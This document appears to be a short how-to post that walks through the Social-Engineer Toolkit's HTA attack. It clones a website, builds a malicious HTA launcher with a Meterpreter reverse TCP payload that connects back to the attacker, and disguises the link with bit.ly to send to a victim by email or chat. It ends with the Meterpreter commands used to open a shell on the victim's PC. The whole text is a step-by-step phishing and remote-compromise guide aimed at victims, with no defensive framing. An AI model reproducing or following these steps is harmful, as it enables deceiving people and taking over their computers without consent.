The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.
First open your kali Linux application tab in Post Exploitation chose SET Toolkit
Now choose option 1, “Social – Engineering Attacks”
Now choose option 2, “Website Attack Vectors”
Now choose option 8, “HTA Attack Method”
Enter the IP address to connect back on: 192.168.0.125 (IP address of Your PC)
Now select the payload I choose 1 Meterpreter reverse TCP.
Now we will choose option 2, “Site Clonerand type the site name you want to be clone. Nad starting MSF listener automatically
Now you will get index.htmland launcher.htain /var/www directory.
Now move both file to var/www/html directory.
Now convert your URL into Bitly URL using bit.ly and send this link address to your victim via Emailor Chat
When Victim Machine browsing to bitly URL it will ask you for Prompt to keep/Discard
Now you will get the meterpreter of victim PC. Now type sessions –l to display sessions opened when the victim opens the link
Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.
